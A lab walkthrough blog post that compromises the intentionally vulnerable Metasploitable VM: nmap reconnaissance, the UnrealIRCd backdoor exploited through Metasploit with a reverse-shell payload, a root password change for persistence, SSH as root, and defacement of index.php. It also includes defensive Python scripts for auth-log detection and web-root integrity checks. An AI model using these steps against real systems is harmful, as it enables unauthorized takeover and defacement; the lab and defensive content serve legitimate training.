Defacing Metasploitable
- Shone Pious
- Sep 28, 2023
- 3 min read
Updated: Sep 30, 2023

This blog is one of a 5-part series on Metasploitable.
Finding target IP (Reconnaissance)
The start of any pentest is reconnaissance, and we can do that with Nmap.
We can find the IP address of our Kali machine by typing
ip addr list

Since the machines are set up in a NAT network with a DHCP server running on it, IP addresses are handed out in order.
And since I set up the Kali machine second, Metasploitable's IP address is 192.168.10.4: the first address (192.168.10.1) belongs to the router, and the second address (192.168.10.2) belongs to the local host machine.
NMAP
To scan the target for open services and their versions, in a Kali terminal, type ➡️
nmap -sV 192.168.10.4
-sV is the flag for version detection.

The host is up and has many open services that are potentially vulnerable to various attacks.
For example, port 80 (HTTP) is open, so the host must be serving a website; the banner identifies the server as Apache httpd 2.2.8.
The version matters because exploits are matched against specific vulnerable versions.
The host also answers pings, so we can open the IP address in a browser and see what it is hosting.


Searchsploit
From the nmap scan, we can also see that there is an UnrealIRCd service running on port 6667.
UnrealIRCd is a popular IRC server; IRC is a protocol for real-time internet messaging.
This version of UnrealIRCd is known to have vulnerabilities, so we can use searchsploit to see if there are any exploits available that we can use. Type ➡️
searchsploit unrealirc
into the Kali terminal. We can see that a backdoor command execution exploit does in fact exist and that it is a Metasploit module.

Msfconsole
To find the matching exploit module, start up Metasploit in the terminal by typing ➡️
msfconsole

Type ➡️
search unrealirc
in the console. We can see that we can leverage backdoor command execution to gain access.
To use the only exploit available, type ➡️
use 0
or ➡️
use [exploit code path]
Then type ➡️
show options
to show any options that need to be changed.

RHOSTS, LHOST, RPORT and LPORT are required, and RHOSTS and LHOST have no value set yet.
RHOSTS is the IP address of the target machine, so I will set it to the Metasploitable machine's IP address.

Now set LHOST to the IP address of the Kali machine.

Type ➡️
show payloads
to reveal all payloads associated with this specific exploit.
Type ➡️
set payload 5
to select ➡️
payload/cmd/unix/reverse

Now type ➡️
exploit

Accessing the shell and maintaining access
I will run this Python one-liner, which spawns a bash shell that I can use to interact with the session ➡️
python -c 'import pty; pty.spawn("/bin/bash")'

Since privileges can't be escalated any further, we can maintain root access by changing the root user's password by typing ➡️
passwd root
and picking a new password.

SSH into root
We can now open an SSH session as the root user by typing ➡️
ssh root@<metasploitable IP address>
in a new terminal session.

SSH connect error
If SSH refuses to connect with a host key algorithm error, try the following command.
ssh -v -oHostKeyAlgorithms=+ssh-rsa username@ipaddress
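Both persistence steps above, the root password change and the SSH login as root, leave standard entries in the system's auth log, and they are what a defender would watch for. The script below is an added example, not code from the post: it runs two regexes over constructed `/var/log/auth.log` lines in the standard pam_unix and sshd formats, raises an alert for any watched account whose password is changed or that logs in over SSH, and flags the takeover pattern of a root password change followed by a root password-based login. The host name, PIDs, timestamps and the 192.168.10.3 client address are made up for the example.

```python
import re

# Constructed auth.log sample in pam_unix / sshd syslog format. Host name, PIDs,
# timestamps and client addresses are invented for this example.
SAMPLE_AUTH_LOG = """\
Sep 28 14:01:02 metasploitable sshd[4410]: Accepted publickey for msfadmin from 192.168.10.2 port 49112 ssh2
Sep 28 14:02:11 metasploitable passwd[4521]: pam_unix(passwd:chauthtok): password changed for root
Sep 28 14:03:40 metasploitable sshd[4602]: Accepted password for root from 192.168.10.3 port 50122 ssh2
Sep 28 14:05:09 metasploitable sshd[4633]: Failed password for root from 192.168.10.3 port 50130 ssh2
"""

# pam_unix writes this line whenever a password is changed via passwd(1).
PASSWD_CHANGE = re.compile(r"pam_unix\(passwd:chauthtok\): password changed for (\S+)")
# sshd writes this line on every successful authentication.
SSH_LOGIN = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port (\d+)")


def detect(lines, watched_users=("root",)):
    """Return one alert dict per watched-account password change or SSH login."""
    alerts = []
    for line in lines:
        m = PASSWD_CHANGE.search(line)
        if m:
            if m.group(1) in watched_users:
                alerts.append({"kind": "password_changed", "user": m.group(1),
                               "method": None, "src": None, "line": line})
            continue
        m = SSH_LOGIN.search(line)
        if m:
            method, user, src, _port = m.groups()
            if user in watched_users:
                alerts.append({"kind": "ssh_login", "user": user,
                               "method": method, "src": src, "line": line})
    return alerts


def flag_takeover(alerts):
    """True when a password change for an account is followed (in log order)
    by a password-authenticated SSH login for the same account."""
    changed = set()
    for a in alerts:
        if a["kind"] == "password_changed":
            changed.add(a["user"])
        elif a["kind"] == "ssh_login" and a["method"] == "password" and a["user"] in changed:
            return True
    return False


if __name__ == "__main__":
    found = detect(SAMPLE_AUTH_LOG.splitlines())
    for a in found:
        print(f"{a['kind']:17} user={a['user']} src={a['src']}")
    print("possible account takeover:", flag_takeover(found))
```

The correlation relies on the file being in chronological order, which is how syslog writes it; on a host where root SSH login is not supposed to happen at all, the `ssh_login` alert alone is already worth paging on, and `PermitRootLogin no` in sshd_config removes the path entirely.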

Defacing website
Now, to deface the Metasploitable website, we need to find where the web server stores the site it is serving.
When we port scanned, we found that the web server was on port 80 and that the software was Apache 2.2.8.
Web server files are usually located at /var/www/html. We can cd into /var/www.
Typing ls now shows the directories and files within that path. The home page of a website is usually called 'index'.

Open index.php in nano.
If you get this error ➡️ Error opening terminal: xterm-256color, try the following command ➡️
export TERM=xterm
Now open the index.php file in nano and edit it as you wish. Then press CTRL+X and Y to save the changes.


Refresh the Metasploitable website we had open before, and you will now see the new page.
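A defacement like this is a file-integrity event: a file under the web root changed without a deployment. As an added example, not part of the original post, the script below baselines a web root by hashing every file with SHA-256, then diffs a later snapshot against that baseline to report modified, added and removed files. The `demo()` function builds a throw-away web root with a constructed index.php, baselines it, overwrites the home page and drops an extra file, and returns the diff; the paths and contents are invented for the example, and nothing here touches /var/www.

```python
import hashlib
import json
import sys
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (as a relative POSIX path) to its SHA-256."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        h = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
        digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Compare two snapshots; any non-empty list is a change the owner must explain."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a fake web root, tamper with it, report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp)
        (web / "index.php").write_text("<?php echo 'welcome'; ?>\n")   # constructed home page
        (web / "css").mkdir()
        (web / "css" / "site.css").write_text("body { color: black; }\n")
        baseline = snapshot(web)
        # Tamper: overwrite the home page and drop an extra file, as a defacement would.
        (web / "index.php").write_text("<h1>defaced</h1>\n")
        (web / "new.html").write_text("<p>unexpected file</p>\n")
        return diff_snapshots(baseline, snapshot(web))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Real use: `python integrity.py <web root> <baseline.json>`; writes the
        # baseline if the file does not exist yet, otherwise prints the diff.
        root, store = Path(sys.argv[1]), Path(sys.argv[2])
        if store.exists():
            print(json.dumps(diff_snapshots(json.loads(store.read_text()), snapshot(root)), indent=2))
        else:
            store.write_text(json.dumps(snapshot(root), indent=2))
            print(f"baseline written to {store}")
    else:
        print(json.dumps(demo(), indent=2))
```

Keep the baseline file off the web host (or on read-only media), since an attacker with root, as in this walkthrough, can otherwise rewrite it along with index.php; re-baseline only as part of a deployment.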
